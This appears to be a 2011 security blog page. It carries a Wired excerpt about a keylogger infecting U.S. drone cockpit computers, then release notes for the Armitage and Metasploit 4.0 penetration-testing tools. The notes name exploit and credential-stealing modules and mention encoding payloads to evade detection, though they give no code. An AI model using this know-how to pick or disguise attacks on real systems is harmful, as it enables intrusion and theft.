A computer virus has infected the cockpits of America’s Predator and Reaper drones, logging pilots’ every keystroke as they remotely fly missions over Afghanistan and other warzones.
The virus, first detected nearly two weeks ago by the military’s Host-Based Security System, has not prevented pilots at Creech Air Force Base in Nevada from flying their missions overseas. Nor have there been any confirmed incidents of classified information being lost or sent to an outside source. But the virus has resisted multiple efforts to remove it from Creech’s computers, network security specialists say. And the infection underscores the ongoing security risks in what has become the U.S. military’s most important weapons system.
“We keep wiping it off, and it keeps coming back,” says a source familiar with the network infection, one of three that told Danger Room about the virus. “We think it’s benign. But we just don’t know.”
Military network security specialists aren’t sure whether the virus and its so-called “keylogger” payload were introduced intentionally or by accident; it may be a common piece of malware that just happened to make its way into these sensitive networks. The specialists don’t know exactly how far the virus has spread. But they’re sure that the infection has hit both classified and unclassified machines at Creech. That raises the possibility, at least, that secret data may have been captured by the keylogger, and then transmitted over the public internet to someone outside the military chain of command.


-News Source (Wired)

SHARE OUR NEWS DIRECTLY ON SOCIAL NETWORKS:-

Armitage (Graphical Cyber Attack Management Tool for Metasploit) 09.26.11 Released

Posted by Avik Sarkar On 10/05/2011 05:35:00 pm


Armitage 09.26.11 released.

Description:-
Armitage is a graphical cyber attack management tool for Metasploit that visualizes your targets, recommends exploits, and exposes the advanced capabilities of the framework. Armitage aims to make Metasploit usable for security practitioners who understand hacking but don’t use Metasploit every day. If you want to learn Metasploit and grow into the advanced features, Armitage can help you.

Official change log for Armitage 09.26.11:-

  • Improved performance when launching exploits and other modules that open a new tab.
  • Launching an exploit will only open a tab when fewer than four hosts are highlighted. If four or more are highlighted, then Armitage will use the old behavior of silently launching each exploit. [You're supposed to be able to attack hundreds of hosts at once--hence my desire to add this caveat]
  • When launching an exploit in the background, Armitage will show a dialog indicating that the exploit was launched against X hosts.
  • You may now drag and drop Armitage tabs to rearrange their order.
  • Armitage “show all commands” option (for better exploit feedback) is now on by default.
  • You may now right-click a screenshot/webcam shot to zoom in or out on the image. The zoom-level stays fixed (in case you refresh the image later)
  • Added a menu to the X button in the tabs. Through this menu you may open the current tab in its own window or close all like tabs.
  • Updated Hosts -> Import Hosts to reflect the current importable file types.
  • Added View -> Reporting -> Export Data to dump most Metasploit tables into TSV and XML files suitable for parsing (by you!) into a report format of some sort.
  • Armitage now encodes (-e x86/shikata_ga_nai -i 3) any Windows meterpreter payload generated from the module launcher dialog.
  • [host] -> Meterpreter -> Access -> Duplicate now uses multi_meter_inject to launch Meterpreter into memory directly (rather than upload and execute a file)
  • In teaming mode, Armitage will now automatically upload a file selected through the + option (e.g., USER_FILE +) to the Metasploit server and set the value in Metasploit accordingly.
  • Modified error output for a failed Metasploit method to only display the method name and error message. Displaying a large input would cause Armitage UI to start flashing in some weird disco mode until a hard reset. Yeaah!
To Download Armitage 09.26.11 Click Here



SHARE OUR NEWS DIRECTLY ON SOCIAL NETWORKS:-

Famous Framework Metasploit v4.0.0

Posted by Avik Sarkar On 8/04/2011 06:55:00 pm

The Metasploit Framework is a penetration testing toolkit, exploit development platform, and research tool. The framework includes hundreds of working remote exploits for a variety of platforms. Payloads, encoders, and nop slide generators can be mixed and matched with exploit modules to solve almost any exploit-related task.

New Exploit Modules:

VSFTPD v2.3.4 Backdoor Command Execution
Java RMI Server Insecure Default Configuration Java Code Execution
HP OpenView Network Node Manager Toolbar.exe CGI Buffer Overflow
HP OpenView Network Node Manager Toolbar.exe CGI Cookie Handling Buffer Overflow
Mozilla Firefox nsTreeRange Dangling Pointer Vulnerability
Black Ice Cover Page ActiveX Control Arbitrary File Download
Microsoft Office Visio VISIODWG.DLL DXF File Handling Vulnerability
MicroP 0.1.1.1600 (MPPL File) Stack Buffer Overflow
Lotus Notes 8.0.x – 8.5.2 FP2 – Autonomy Keyview
RealWin SCADA Server DATAC Login Buffer Overflow
Siemens FactoryLink vrn.exe Opcode 9 Buffer Overflow
Iconics GENESIS32 Integer overflow version 9.21.201.01
Siemens FactoryLink 8 CSService Logging Path Param Buffer Overflow
Sielco Sistemi Winlog Buffer Overflow
Blue Coat Authentication and Authorization Agent (BCAAA) 5 Buffer Overflow
HP OmniInet.exe Opcode 20 Buffer Overflow
HP OmniInet.exe Opcode 27 Buffer Overflow
Citrix Provisioning Services 5.6 streamprocess.exe Buffer Overflow
Lotus Notes 8.0.x – 8.5.2 FP2 – Autonomy Keyview

New Post-Exploitation Modules:

Winlogon Lockout Credential Keylogger
Windows Gather Microsoft Outlook Saved Password Extraction
Windows Gather Process Memory Grep
Windows Gather Trillian Password Extractor
Windows PCI Hardware Enumeration
Windows Gather FlashFXP Saved Password Extraction
Windows Gather Local and Domain Controller Account Password Hashes
Windows Gather Nimbuzz Instant Messenger Password Extractor
Windows Gather CoreFTP Saved Password Extraction
Internet Download Manager (IDM) Password Extractor
Windows Gather SmartFTP Saved Password Extraction
Windows Gather Bitcoin wallet.dat
Windows Gather Service Info Enumeration
Windows Gather IPSwitch iMail User Data Enumeration

New Auxiliary Modules:

John the Ripper Password Cracker Fast Mode
Microsoft Windows DNSAPI.dll LLMNR Buffer Underrun DoS
Kaillera 0.86 Server Denial of Service
2Wire Cross-Site Request Forgery Password Reset Vulnerability
SIPDroid Extension Grabber
MSSQL Password Hashdump

Notable Features & Closed Bugs:-

Feature #4982 – Support for custom executable with psexec
Feature #4856 – RegLoadKey and RegUnLoadKey functions for the Meterpreter stdapi
Feature #4578 – Update Nmap XML parsers to support Nokogiri parsing
Feature #4417 – Post exploitation module to harvest OpenSSH credentials
Feature #4015 – Increase test coverage for railgun
Bug #4963 – Rework db_* commands for consistency
Bug #4892 – non-windows meterpreters upload into the wrong filename
Bug #4296 – Meterpreter stdapi registry functions create key if one doesn’t exist
Bug #3565 – framework installer fails on RHEL (postgres taking too long to start)

Armitage integrates with Metasploit 4.0 to:-

Take advantage of the new Meterpreter payload stagers
Crack credentials with the click of a button
Run post modules against multiple hosts
Automatically log all post-exploitation activity
Revision Information:
Framework Revision 13462
Several import parsers were rewritten to use Nokogiri for much faster processing of large import files. Adding to Metasploit’s extensive payload support, Windows and Java Meterpreter now both support staging over HTTP and Windows can use HTTPS. In a similar vein, POSIX Meterpreter is seeing some new development again. It still isn’t perfect nor is it nearly as complete as the Windows version, but many features already work. Java applet signing is now done directly in Ruby, removing the need for a JDK for generating self-signed certificates. The Linux installers now ship with ruby headers, making it possible to install native gems in the Metasploit ruby environment.

Another flexibility improvement comes in the form of a consolidated pcap interface. The pcaprub extension ships with the Linux installers as of this release and support for Windows will come soon. Modules that used Racket for generating raw packets have been converted to Packetfu, which provides a smoother API for modules to capture and inject packets.

To download Metasploit Framework v4.0.0 Click Here
For more information abous MSF click here

SHARE OUR NEWS DIRECTLY ON SOCIAL NETWORKS:-

Related Posts Plugin for WordPress, Blogger...

Site search